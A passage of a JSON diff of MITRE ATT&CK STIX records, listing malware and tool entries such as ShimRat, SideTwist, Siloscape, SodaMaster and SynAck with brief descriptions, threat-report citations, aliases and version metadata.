The name \"[ShimRat](https://attack.mitre.org/software/S0444)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0444", + "external_id": "S0444" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ShimRat" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:24.555000+00:00\", \"old_value\": \"2025-04-16 20:38:09.372000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-12 21:29:48.294000+00:00", + "modified": "2025-04-25 14:45:13.595000+00:00", + "name": "ShimRatReporter", + "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. 
The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0445", + "external_id": "S0445" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ShimRatReporter" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:13.595000+00:00\", \"old_value\": \"2025-04-16 20:38:50.090000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--df4cd566-ff2f-4d08-976d-8c86e95782de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-05-06 14:44:50.494000+00:00", + "modified": "2025-04-25 14:44:52.304000+00:00", + "name": "SideTwist", + "description": "[SideTwist](https://attack.mitre.org/software/S0610) is 
a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0610", + "external_id": "S0610" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SideTwist" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:52.304000+00:00\", \"old_value\": \"2025-04-16 20:38:38.737000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--4fbd565b-bf55-4ac7-80b4-b183a7b64b9c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 15:26:55.509000+00:00", + "modified": "2025-04-25 14:43:17.695000+00:00", + "name": "Siloscape", + "description": "[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. 
[Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0623", + "external_id": "S0623" + }, + { + "source_name": "Unit 42 Siloscape Jun 2021", + "description": "Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/siloscape/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Siloscape" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Prizmant, Palo Alto Networks", + "Yuval Avrahami, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Containers" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:17.695000+00:00\", \"old_value\": \"2025-04-16 20:38:07.079000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e494ad79-37ee-4cd0-866b-299c521d8b94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:56.967000+00:00", + "name": "Socksbot", + "description": "[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. 
(Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0273", + "external_id": "S0273" + }, + { + "source_name": "Socksbot", + "description": "(Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Socksbot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:56.967000+00:00\", \"old_value\": \"2025-04-16 20:38:40.498000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--94d6d788-07bb-4dcc-b62f-e02626b00108", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-21 15:52:14.624000+00:00", + "modified": "2025-04-25 14:44:05.856000+00:00", + "name": "SodaMaster", + "description": "[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0627", + "external_id": "S0627" + }, + { + "source_name": "DARKTOWN", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "dfls", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "DelfsCake", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SodaMaster", + "DARKTOWN", + "dfls", + "DelfsCake" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:05.856000+00:00\", \"old_value\": \"2025-04-16 20:38:24.073000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-29 19:33:35.122000+00:00", + "modified": "2025-04-25 14:44:55.728000+00:00", + "name": "SoreFang", + "description": "[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)", + "revoked": false, + "labels": [ + 
"malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0516", + "external_id": "S0516" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + }, + { + "source_name": "CISA SoreFang July 2016", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SoreFang" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:55.728000+00:00\", \"old_value\": \"2025-04-16 20:38:40.031000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-15 01:30:05.198000+00:00", + "modified": "2025-04-25 14:42:31.753000+00:00", + "name": "Spark", + "description": "\n[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0543", + 
"external_id": "S0543" + }, + { + "source_name": "Spark", + "description": "\n(Citation: Unit42 Molerat Mar 2020) " + }, + { + "source_name": "Unit42 Molerat Mar 2020", + "description": "Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.", + "url": "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Spark" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:31.753000+00:00\", \"old_value\": \"2025-04-16 20:37:52.059000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--599cd7b5-37b5-4cdd-8174-2811531ce9d0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 14:55:00.996000+00:00", + "modified": "2025-04-25 14:43:27.242000+00:00", + "name": "SpicyOmelette", + "description": "[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0646", + "external_id": "S0646" + }, + { + "source_name": "Secureworks GOLD KINGSWOOD September 2018", + "description": "CTU. (2018, September 27). 
Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.", + "url": "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpicyOmelette" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:27.242000+00:00\", \"old_value\": \"2025-04-16 20:38:10.394000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:39.606000+00:00", + "modified": "2025-04-25 14:42:57.989000+00:00", + "name": "SslMM", + "description": "[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0058", + "external_id": "S0058" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. 
Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SslMM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:57.989000+00:00\", \"old_value\": \"2025-04-16 20:38:01.128000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--96566860-9f11-4b6f-964d-1c924e4f24a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:07.496000+00:00", + "name": "Starloader", + "description": "[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0188", + "external_id": "S0188" + }, + { + "source_name": "Starloader", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. 
Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Starloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:07.496000+00:00\", \"old_value\": \"2025-04-16 20:38:24.530000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--91000a8a-58cc-4aba-9ad0-993ad6302b86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:21.437000+00:00", + "modified": "2025-04-25 14:44:02.994000+00:00", + "name": "StreamEx", + "description": "[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0142", + "external_id": "S0142" + }, + { + "source_name": "StreamEx", + "description": "(Citation: Cylance Shell Crew Feb 2017)" + }, + { + "source_name": "Cylance Shell Crew Feb 2017", + "description": "Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV\u2019s Radar. 
Retrieved February 15, 2017.", + "url": "https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "StreamEx" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:02.994000+00:00\", \"old_value\": \"2025-04-16 20:38:22.967000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:17.568000+00:00", + "modified": "2025-04-25 14:43:39.731000+00:00", + "name": "Sykipot", + "description": "[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0018", + "external_id": "S0018" + }, + { + "source_name": "Alienvault Sykipot DOD Smart Cards", + "description": "Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. 
Retrieved January 10, 2016.", + "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards" + }, + { + "source_name": "Blasco 2013", + "description": "Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.", + "url": "http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Sykipot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:39.731000+00:00\", \"old_value\": \"2025-04-16 20:38:14.881000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:32.305000+00:00", + "name": "SynAck", + "description": "[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. 
(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0242", + "external_id": "S0242" + }, + { + "source_name": "SynAck", + "description": "(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + }, + { + "source_name": "Kaspersky Lab SynAck May 2018", + "description": "Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelg\u00e4nging technique. Retrieved May 24, 2018.", + "url": "https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SynAck" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:32.305000+00:00\", \"old_value\": \"2025-04-16 20:37:52.360000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--7f8730af-f683-423f-9ee1-5f6875a80481", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:40.391000+00:00", + "modified": 
"2025-04-25 14:43:52.533000+00:00", + "name": "Sys10", + "description": "[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0060", + "external_id": "S0060" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Sys10" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.533000+00:00\", \"old_value\": \"2025-04-16 20:38:20.019000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--876f6a77-fbc5-4e13-ab1a-5611986730a3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:01.951000+00:00", + "modified": "2025-04-25 14:43:55.595000+00:00", + "name": "T9000", + "description": "[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. 
It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0098", + "external_id": "S0098" + }, + { + "source_name": "FireEye admin@338 March 2014", + "description": "Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html" + }, + { + "source_name": "Palo Alto T9000 Feb 2016", + "description": "Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "T9000" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:55.595000+00:00\", \"old_value\": \"2025-04-16 20:38:20.867000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7f4bbe05-1674-4087-8a16-8f1ad61b6152", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
